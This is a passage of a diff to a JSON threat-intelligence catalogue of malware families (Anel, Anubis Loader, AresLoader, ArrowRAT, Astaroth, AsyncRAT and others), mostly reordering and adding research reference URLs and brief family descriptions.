"https://www.cert.ssi.gouv.fr/uploads/CERTFR-2020-CTI-006.pdf",
- "https://www.pwc.co.uk/cyber-security/assets/cyber-threats-2019-retrospect.pdf",
- "https://blog.intel471.com/2020/05/21/a-brief-history-of-ta505/",
- "https://intel471.com/blog/a-brief-history-of-ta505",
- "https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
"https://documents.trendmicro.com/assets/Tech-Brief-Latest-Spam-Campaigns-from-TA505-Now-Using-New-Malware-Tools-Gelup-and-FlowerPippi.pdf"
],
"synonyms": [
@@ -12203,11 +12937,11 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anel",
- "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
"https://www.macnica.net/file/mpressioncss_2018-1h-report_mnc_rev3_nopw.pdf",
- "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/",
"https://www.macnica.net/file/mpressioncss_ta_report_2019.pdf",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/chessmaster-adds-updated-tools-to-its-arsenal/"
+ "https://www.secureworks.com/research/threat-profiles/bronze-riverside",
+ "https://www.virusbulletin.com/uploads/pdf/conference_slides/2019/VB2019-Haruyama.pdf"
],
"synonyms": [
"UPPERCUT",
@@ -12215,15 +12949,6 @@
],
"type": []
},
- "related": [
- {
- "dest-uuid": "588b97ff-3434-4aa1-a5fd-815e1bb0178b",
- "tags": [
- "estimative-language:likelihood-probability=\"almost-certain\""
- ],
- "type": "similar"
- }
- ],
"uuid": "a180afcc-d42d-4600-b70f-af27aaf851b7",
"value": "Anel"
},
@@ -12260,10 +12985,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis",
- "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/",
"https://medium.com/csis-techblog/inside-view-of-brazzzersff-infrastructure-89b9188fd145",
- "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/",
- "https://twitter.com/MsftSecIntel/status/1298752223321546754"
+ "https://twitter.com/MsftSecIntel/status/1298752223321546754",
+ "https://cybleinc.com/2021/05/02/mobile-malware-app-anubis-strikes-again-continues-to-lure-users-disguised-as-a-fake-antivirus/",
+ "https://therecord.media/russian-hacker-pavel-sitnikov-arrested-for-sharing-malware-source-code/"
],
"synonyms": [
"Anubis Stealer"
@@ -12279,10 +13004,10 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.anubis_loader",
"https://www.zerofox.com/blog/meet-kraken-a-new-golang-botnet-in-development/",
+ "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e",
"https://www.zerofox.com/blog/quick-update-kraken-completes-its-rebrand-to-anubis/",
- "https://windowsreport.com/kraken-botnet/",
"https://www.bleepingcomputer.com/news/security/new-golang-botnet-empties-windows-users-cryptocurrency-wallets/",
- "https://medium.com/walmartglobaltech/privateloader-to-anubis-loader-55d066a2653e"
+ "https://windowsreport.com/kraken-botnet/"
],
"synonyms": [
"Kraken",
@@ -12293,6 +13018,19 @@
"uuid": "e65ca164-f448-4f8e-a672-3ff7ec37e191",
"value": "Anubis Loader"
},
+ {
+ "description": "",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aperetif",
+ "https://www.sentinelone.com/labs/winter-vivern-uncovering-a-wave-of-global-espionage/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "573eb306-f6c7-4ba9-91a9-881473d335b8",
+ "value": "APERETIF"
+ },
{
"description": "",
"meta": {
@@ -12319,16 +13057,30 @@
"uuid": "e87d9df4-b464-4458-ae1f-31cea40d5f96",
"value": "Apocalypse"
},
+ {
+ "description": "This is an implant usable with the Mythic C2 framework. Apollo is a Windows agent written in C# using the 4.0 .NET Framework designed to be used in SpecterOps training offerings.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.apollo",
+ "https://github.com/MythicAgents/Apollo"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "f995662c-27ad-440b-97ce-f1ecd2b59221",
+ "value": "Apollo"
+ },
{
"description": "Malware used by suspected Iranian threat actor Agrius, turned from wiper into ransomware.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.apostle",
- "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/",
- "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/",
+ "https://www.welivesecurity.com/2022/12/07/fantasy-new-agrius-wiper-supply-chain-attack/",
+ "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf",
"https://assets.sentinelone.com/sentinellabs/evol-agrius",
"https://www.crowdstrike.com/blog/the-anatomy-of-wiper-malware-part-1/",
- "https://www.sentinelone.com/wp-content/uploads/2021/05/SentinelLabs_From-Wiper-to-Ransomware-The-Evolution-of-Agrius.pdf"
+ "https://www.sentinelone.com/labs/new-version-of-apostle-ransomware-reemerges-in-targeted-attack-on-higher-education/",
+ "https://cyberpunkleigh.wordpress.com/2021/05/27/apostle-ransomware-analysis/"
],
"synonyms": [],
"type": []
@@ -12341,17 +13093,20 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.applejeus",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
- "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
- "https://www.telsy.com/download/5394/?uid=28b0a4577e",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048g",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048b",
- "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
"https://ti.qianxin.com/uploads/2020/02/13/cb78386a082f465f259b37dae5df4884.pdf",
+ "https://mandiant.widen.net/s/pkffwrbjlz/m-trends-2023",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048c",
- "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html",
+ "https://blog.sekoia.io/the-dprk-delicate-sound-of-cyber/",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048d",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048f",
+ "https://cocomelonc.github.io/tutorial/2022/05/09/malware-pers-4.html",
"https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048a",
+ "https://us-cert.cisa.gov/ncas/analysis-reports/ar21-048e",
+ "https://www.telsy.com/download/5394/?uid=28b0a4577e",
+ "https://www.vkremez.com/2019/10/lets-learn-dissecting-lazarus-windows.html",
+ "https://us-cert.cisa.gov/ncas/alerts/aa21-048a",
"https://twitter.com/VK_Intel/status/1182730637016481793"
],
"synonyms": [],
@@ -12365,22 +13120,24 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.appleseed",
- "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
- "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2652&attach_file_id=EpF2652.pdf",
- "https://www.youtube.com/watch?v=Dv2_DK3tRgI",
- "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
- "https://www.telsy.com/download/5654/?uid=4869868efd",
- "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
- "https://www.youtube.com/watch?v=rfzmHjZX70s",
- "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
- "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
"https://blog.malwarebytes.com/threat-analysis/2021/06/kimsuky-apt-continues-to-target-south-korean-government-using-appleseed-backdoor/",
- "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf",
- "https://asec.ahnlab.com/en/30532/",
+ "https://download.ahnlab.com/global/brochure/Analysis%20Report%20of%20Kimsuky%20Group.pdf",
+ "https://vblocalhost.com/presentations/operation-newton-hi-kimsuky-did-an-appleseed-really-fall-on-newtons-head/",
"https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2652.pdf",
+ "https://www.youtube.com/watch?v=rfzmHjZX70s",
+ "https://asec.ahnlab.com/wp-content/uploads/2021/11/Kimsuky-%EA%B7%B8%EB%A3%B9%EC%9D%98-APT-%EA%B3%B5%EA%B2%A9-%EB%B6%84%EC%84%9D-%EB%B3%B4%EA%B3%A0%EC%84%9C-AppleSeed-PebbleDash.pdf",
"https://asec.ahnlab.com/ko/26705/",
- "https://asec.ahnlab.com/ko/36918/"
+ "https://asec.ahnlab.com/en/36368/",
+ "https://i.blackhat.com/asia-21/Friday-Handouts/as-21-Kuo-We-Are-About-To-Land-How-CloudDragon-Turns-A-Nightmare-Into-Reality.pdf",
+ "https://www.boho.or.kr/filedownload.do?attach_file_seq=2651&attach_file_id=EpF2651.pdf",
+ "https://www.telsy.com/download/5654/?uid=4869868efd",
+ "https://asec.ahnlab.com/en/30532/",
+ "https://asec.ahnlab.com/ko/36918/",
+ "https://asec.ahnlab.com/en/41015/",
+ "https://conference.hitb.org/hitbsecconf2021ams/materials/D2T1%20-%20The%20Phishermen%20-%20Dissecting%20Phishing%20Techniques%20of%20CloudDragon%20APT%20-%20Linda%20Kuo%20&Zih-Cing%20Liao%20.pdf",
+ "https://www.pwc.co.uk/cyber-security/pdf/pwc-cyber-threats-2020-a-year-in-retrospect.pdf",
+ "https://www.youtube.com/watch?v=Dv2_DK3tRgI"
],
"synonyms": [
"JamBog"
@@ -12395,8 +13152,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ardamax",
- "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf"
+ "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
+ "https://medium.com/@MalFuzzer/dissecting-ardamax-keylogger-f33f922d2576"
],
"synonyms": [],
"type": []
@@ -12431,12 +13188,30 @@
"uuid": "a711ad02-0120-41a1-8c03-8a857a7dc297",
"value": "Ares (Windows)"
},
+ {
+ "description": "AresLoader is a new malware \"downloader\" that has been advertised on some Russian language Dark Web forums “RAMP and \"XSS\" by a threat actor called \"DarkBLUP\". Researchers assess this loader is likely a legitimate penetration testing tool that is now being abused by threat actors. This is because of a similar project, dubbed “Project Ares,” was previously uploaded to GitHub as a proof-of-concept (PoC) by the well-regarded user and red teamer “CerberSec.”\r\n\r\nThe loader mimics legitimate software to trick victims into executing malware with administrator rights on their machines. Additional features of the loader include:\r\n\r\n1. Written in C/C++\r\n2. Supports 64-bit payloads\r\n3. Makes it look like malware spawned by another process\r\n4. Prevents non-Microsoft signed binaries from being injected into malware\r\n5. Hides suspicious imported Windows APIs\r\n6. Leverages anti-analysis techniques to avoid reverse engineering\r\n\r\nFurthermore, It was observed that SystemBC, Amadey, and several Raccoon Stealers were directly installing AresLoader. To date, the AresLoader downloader has been seen delivering payloads like SystemBC, Lumma Stealer, StealC, Aurora Stealer, and Laplas Clipper.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.aresloader",
+ "https://intel471.com/blog/new-loader-on-the-bloc-aresloader",
+ "https://research.openanalysis.net/ares/aresloader/loader/2023/04/02/aresloader.html",
+ "https://flashpoint.io/blog/private-malware-for-sale-aresloader/",
+ "https://twitter.com/k3dg3/status/1636873721200746496",
+ "https://www.zerofox.com/blog/the-underground-economist-volume-2-issue-24/"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "1bd6c2ab-341e-43e1-90ca-2e7509828268",
+ "value": "AresLoader"
+ },
{
"description": "During a campaign against a Ukrainian energy provider, a new loader of a new version of CaddyWiper called \"ArguePatch\" was observed by ESET researchers. ArguePatch is a modified version of Hex-Ray's Remote Debugger Server (win32_remote.exe).\r\nArguePatch expects a decryption key and the file of the CaddyWiper shellcode as command line parameters.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.arguepatch",
- "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/"
+ "https://www.welivesecurity.com/2022/04/12/industroyer2-industroyer-reloaded/",
+ "https://www.mandiant.com/resources/blog/gru-rise-telegram-minions"
],
"synonyms": [],
"type": []
@@ -12450,9 +13225,9 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ariabody",
"https://medium.com/insomniacs/aria-body-loader-is-that-you-53bdd630f8a1",
+ "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/",
"https://securelist.com/it-threat-evolution-q2-2020/98230",
- "https://securelist.com/naikons-aria/96899/",
- "https://research.checkpoint.com/2020/naikon-apt-cyber-espionage-reloaded/"
+ "https://securelist.com/naikons-aria/96899/"
],
"synonyms": [],
"type": []
@@ -12466,6 +13241,7 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.aridgopher",
"https://www.deepinstinct.com/blog/arid-gopher-the-newest-micropsia-malware-variant",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/mantis-palestinian-attacks",
"https://www.theregister.com/2022/03/22/arid-gopher-malware-deep-instinct/"
],
"synonyms": [],
@@ -12507,14 +13283,18 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.arkei_stealer",
- "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "https://isc.sans.edu/diary/rss/28468",
+ "https://ke-la.com/information-stealers-a-new-landscape/",
"https://fumik0.com/2018/12/24/lets-dig-into-vidar-an-arkei-copycat-forked-stealer-in-depth-analysis/",
- "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
- "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets",
+ "https://info.spamhaus.com/hubfs/Botnet%20Reports/2022%20Q3%20Botnet%20Threat%20Update.pdf",
+ "https://threatmon.io/arkei-stealer-analysis-threatmon/",
"https://forensicitguy.github.io/analyzing-stealer-msi-using-msitools/",
"https://www.bleepingcomputer.com/news/security/hacker-breaches-syscoin-github-account-and-poisons-official-client/",
- "https://ke-la.com/information-stealers-a-new-landscape/",
- "https://isc.sans.edu/diary/rss/28468"
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://blogs.blackberry.com/en/2022/02/threat-thursday-arkei-infostealer",
+ "https://isc.sans.edu/diary/Arkei+Variants%3A+From+Vidar+to+Mars+Stealer/28468",
+ "https://blog.minerva-labs.com/a-long-list-of-arkei-stealers-browser-crypto-wallets",
+ "https://drive.google.com/file/d/1wTH-BZrjxEBZwCnXJ3pQWGB7ou0IoBEr/view"
],
"synonyms": [
"ArkeiStealer"
@@ -12524,13 +13304,26 @@
"uuid": "59eff508-7f26-4fd8-b526-5772a9f3d9a6",
"value": "Arkei Stealer"
},
+ {
+ "description": "It is available as a service, purchasable by anyone to use in their own campaigns. It’s features are generally fairly typical of a RAT, with its most notable aspect being the hVNC module which basically gives an attacker full remote access with minimal need for technical knowledge to use it.",
+ "meta": {
+ "refs": [
+ "https://malpedia.caad.fkie.fraunhofer.de/details/win.arrowrat",
+ "https://www.arrowrat.com"
+ ],
+ "synonyms": [],
+ "type": []
+ },
+ "uuid": "3d5608dc-1e0d-40cb-8a17-3a8d7efb1c53",
+ "value": "ArrowRAT"
+ },
{
"description": "ARS Loader, also known as ARS VBS Loader, is written in Visual Basic Script and its main purpose is to control an infected machine via different available commands, acting as a remote access trojan (RAT). Its code is based on ASPC, another Visual Basic Script malware, which at the same time seems to be based on SafeLoader.",
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.ars_loader",
- "https://twitter.com/Racco42/status/1001374490339790849",
"https://www.flashpoint-intel.com/blog/meet-ars-vbs-loader/",
+ "https://twitter.com/Racco42/status/1001374490339790849",
"https://www.blueliv.com/blog-news/research/ars-loader-evolution-zeroevil-ta545-airnaine/"
],
"synonyms": [],
@@ -12558,13 +13351,13 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.artra",
- "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
- "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english",
"https://www.freebuf.com/articles/database/192726.html",
- "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
"https://blog.talosintelligence.com/2022/05/bitter-apt-adds-bangladesh-to-their.html",
- "https://securelist.com/apt-trends-report-q1-2021/101967/",
- "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/"
+ "https://www.secuinfra.com/en/techtalk/whatever-floats-your-boat-bitter-apt-continues-to-target-bangladesh/",
+ "https://www.bitdefender.com/files/News/CaseStudies/study/352/Bitdefender-PR-Whitepaper-BitterAPT-creat4571-en-EN-GenericUse.pdf",
+ "https://ti.360.net/blog/articles/analysis-of-targeted-attack-against-pakistan-by-exploiting-inpage-vulnerability-and-related-apt-groups-english",
+ "https://unit42.paloaltonetworks.com/multiple-artradownloader-variants-used-by-bitter-to-target-pakistan/",
+ "https://securelist.com/apt-trends-report-q1-2021/101967/"
],
"synonyms": [],
"type": []
@@ -12615,8 +13408,8 @@
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asprox",
"https://www.virusbulletin.com/virusbulletin/2012/11/tracking-2012-sasfis-campaign",
- "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/",
- "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/"
+ "http://oalabs.openanalysis.net/2014/12/04/inside-the-new-asprox-kuluoz-october-2013-january-2014/",
+ "https://researchcenter.paloaltonetworks.com/2015/08/whats-next-in-malware-after-kuluoz/"
],
"synonyms": [
"Aseljo",
@@ -12632,8 +13425,8 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asruex",
- "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/",
- "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html"
+ "https://blog.bushidotoken.net/2020/06/deep-dive-darkhotel-apt.html",
+ "https://blog.trendmicro.com/trendlabs-security-intelligence/asruex-backdoor-variant-infects-word-documents-and-pdfs-through-old-ms-office-and-adobe-vulnerabilities/"
],
"synonyms": [],
"type": []
@@ -12646,21 +13439,21 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.astaroth",
- "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
- "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
- "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962",
- "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
- "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/",
- "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research",
- "https://blog.easysol.net/meet-lucifer-international-trojan/",
- "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/",
- "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/",
- "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/",
"https://blog.talosintelligence.com/2020/05/astaroth-analysis.html",
- "https://isc.sans.edu/diary/27482",
- "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt",
"https://securelist.com/the-tetrade-brazilian-banking-malware/97779/",
- "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/"
+ "https://www.botconf.eu/wp-content/uploads/2019/12/B2019-Soucek-Hornak-DemystifyingBankingTrojansFromLatinAmerica.pdf",
+ "https://www.welivesecurity.com/2020/03/05/guildma-devil-drives-electric/",
+ "https://www.microsoft.com/security/blog/2020/03/23/latest-astaroth-living-off-the-land-attacks-are-even-more-invisible-but-not-less-observable/",
+ "https://www.microsoft.com/security/blog/2019/07/08/dismantling-a-fileless-campaign-microsoft-defender-atp-next-gen-protection-exposes-astaroth-attack/",
+ "https://isc.sans.edu/diary/Brazil+malspam+pushes+Astaroth+%28Guildma%29+malware/28962",
+ "https://www.cybereason.com/blog/information-stealing-malware-targeting-brazil-full-research",
+ "https://blog.talosintelligence.com/2020/12/2020-year-in-malware.html",
+ "https://www.armor.com/resources/threat-intelligence/astaroth-banking-trojan/",
+ "https://github.com/pan-unit42/tweets/blob/master/2022-01-17-IOCs-for-Astaroth-Guildma-infection.txt",
+ "https://blog.easysol.net/meet-lucifer-international-trojan/",
+ "https://www.blackberry.com/content/dam/blackberry-com/asset/enterprise/pdf/direct/report-bb-2021-threat-report.pdf",
+ "https://isc.sans.edu/diary/27482",
+ "https://labs.f-secure.com/blog/attack-detection-fundamentals-code-execution-and-persistence-lab-1/"
],
"synonyms": [
"Guildma"
@@ -12675,10 +13468,10 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.astralocker",
- "https://www.emsisoft.com/ransomware-decryption-tools/astralocker",
"https://www.bleepingcomputer.com/news/security/astralocker-ransomware-shuts-down-and-releases-decryptors/",
+ "https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs",
"https://blog.malwarebytes.com/ransomware/2022/07/astralocker-2-0-ransomware-isnt-going-to-give-you-your-files-back/",
- "https://blog.reversinglabs.com/blog/smash-and-grab-astralocker-2-pushes-ransomware-direct-from-office-docs"
+ "https://www.emsisoft.com/ransomware-decryption-tools/astralocker"
],
"synonyms": [],
"type": []
@@ -12691,77 +13484,90 @@
"meta": {
"refs": [
"https://malpedia.caad.fkie.fraunhofer.de/details/win.asyncrat",
- "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html",
- "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
- "https://community.riskiq.com/article/3929ede0/description",
- "https://threatresearch.ext.hp.com/wp-content/uploads/2022/05/HP-Wolf-Security-Threat-Insights-Report-Q1-2022.pdf",
- "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
- "https://www.trendmicro.com/vinfo/us/security/news/cybercrime-and-digital-threats/how-cybercriminals-abuse-cloud-tunneling-services",
- "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
- "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign",
"https://blog.morphisec.com/tracking-hcrypt-an-active-crypter-as-a-service",
- "https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader",
- "https://eln0ty.github.io/malware%20analysis/asyncRAT/",
- "https://www.intezer.com/wp-content/uploads/2021/02/Intezer-2020-Go-Malware-Round-Up.pdf",
- "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware",
"https://www.trendmicro.com/en_us/research/21/i/apt-c-36-updates-its-long-term-spam-campaign-against-south-ameri.html",
- "https://community.riskiq.com/article/ade260c6",
- "https://brianstadnicki.github.io/posts/vulnerability-asyncrat-rce/",
- "https://www.botconf.eu/wp-content/uploads/2022/05/Botconf2022-40-LunghiHorejsi.pdf",
- "https://www.proofpoint.com/us/blog/threat-insight/threat-actor-profile-ta2719-uses-colorful-lures-deliver-rats-local-languages",
- "https://blog.netlab.360.com/purecrypter",
- "https://www.trellix.com/en-us/about/newsroom/stories/threat-labs/targeted-attack-on-government-agencies.html",
- "https://www.zscaler.com/blogs/security-research/targeted-attack-thailand-pass-customers-delivers-asyncrat",
- "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
- "https://ti.qianxin.com/uploads/2020/09/17/69da886eecc7087e9dac2d3ea4c66ba8.pdf",
- "https://assets.virustotal.com/reports/2021trends.pdf",
- "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection",
- "https://www.ciphertechsolutions.com/roboski-global-recovery-automation/",
- "https://www.ncsc.admin.ch/ncsc/en/home/aktuell/im-fokus/2022/wochenrueckblick_7.html",
- "https://www.welivesecurity.com/2021/01/12/operation-spalax-targeted-malware-attacks-colombia/",
- "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
- "https://securityintelligence.com/posts/roboski-global-recovery-automation/",
- "https://blogs.blackberry.com/en/2022/05/dot-net-stubs-sowing-the-seeds-of-discord",
- "https://blogs.jpcert.or.jp/en/2020/12/quasar-family.html",
- "https://github.com/NYAN-x-CAT/AsyncRAT-C-Sharp/",
- "https://securelist.com/apt-trends-report-q3-2020/99204/",
- "https://blog.morphisec.com/hubfs/Journey%20of%20a%20Crypto%20Scammer%20-%20NFT-001%20%7C%20Morphisec%20%7C%20Threat%20Report.pdf",
- "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/",
- "https://github.com/jeFF0Falltrades/Tutorials/tree/master/asyncrat_config_parser",
- "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat",
- "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
- "https://blog.talosintelligence.com/2022/04/asyncrat-3losh-update.html",
- "https://twitter.com/ESETresearch/status/1449132020613922828",
- "https://www.netskope.com/blog/asyncrat-using-fully-undetected-downloader",
- "https://blog.talosintelligence.com/2022/01/nanocore-netwire-and-asyncrat-spreading.html",
- "https://labs.k7computing.com/?p=21759",
+ "https://community.riskiq.com/article/24759ad2",
+ "https://www.trendmicro.com/en_us/research/22/d/new-apt-group-earth-berberoka-targets-gambling-websites-with-old.html",
+ "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/follina-msdt-exploit-malware",
+ "https://medium.com/@hcksyd/asyncrat-analysing-the-three-stages-of-execution-378b343216bf",
+ "https://www.zscaler.com/blogs/security-research/catching-rats-over-custom-protocols",
+ "https://cocomelonc.github.io/malware/2023/01/04/malware-tricks-26.html",
+ "https://jstnk9.github.io/jstnk9/research/AsyncRAT-Analysis/",
+ "https://www.menlosecurity.com/blog/isomorph-infection-in-depth-analysis-of-a-new-html-smuggling-campaign/",
+ "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia",
+ "https://threatresearch.ext.hp.com/stealthy-opendocument-malware-targets-latin-american-hotels/#",
"https://resecurity.com/blog/article/shortcut-based-lnk-attacks-delivering-malicious-code-on-the-rise",
+ "https://intel471.com/blog/china-cybercrime-undergrond-deepmix-tea-horse-road-great-firewall/",
+ "https://www.fortinet.com/blog/threat-research/spear-phishing-campaign-with-new-techniques-aimed-at-aviation-companies",
+ "https://decoded.avast.io/threatintel/outbreak-of-follina-in-australia/",
"https://twitter.com/MsftSecIntel/status/1392219299696152578",
+ "https://documents.trendmicro.com/assets/txt/earth-berberoka-windows-iocs-2.txt",
+ "https://blog.talosintelligence.com/2021/09/operation-layover-how-we-tracked-attack.html",
+ "https://www.zscaler.com/blogs/security-research/onenote-growing-threat-malware-distribution",
+ "https://blog.qualys.com/vulnerabilities-threat-research/2022/08/16/asyncrat-c2-framework-overview-technical-analysis-and-detection",
+ "https://www.spamhaus.org/news/images/botnet-report-2020-q2/2020-q2-spamhaus-botnet-threat-report.pdf",
+ "https://www.huntress.com/blog/advanced-cyberchef-tips-asyncrat-loader",
+ "https://www.fortinet.com/blog/threat-research/threat-actors-prey-on-eager-travelers",
+ "https://blog.morphisec.com/ahk-rat-loader-leveraged-in-unique-delivery-campaigns",
+ "https://thehackernews.com/2022/01/hackers-using-new-evasive-technique-to.html",
+ "https://ics-cert.kaspersky.com/media/Kaspersky-ICS-CERT-APT-attacks-on-industrial-organizations-in-H1-2021-En.pdf",
+ "https://redskyalliance.org/xindustry/possible-identity-of-a-kuwaiti-hacker-nyanxcat",
+ "https://blog.morphisec.com/asyncrat-new-delivery-technique-new-threat-campaign",
+ "https://www.trendmicro.com/en_us/research/21/k/campaign-abusing-rats-uses-fake-websites.html",
+ "https://labs.k7computing.com/?p=21759",
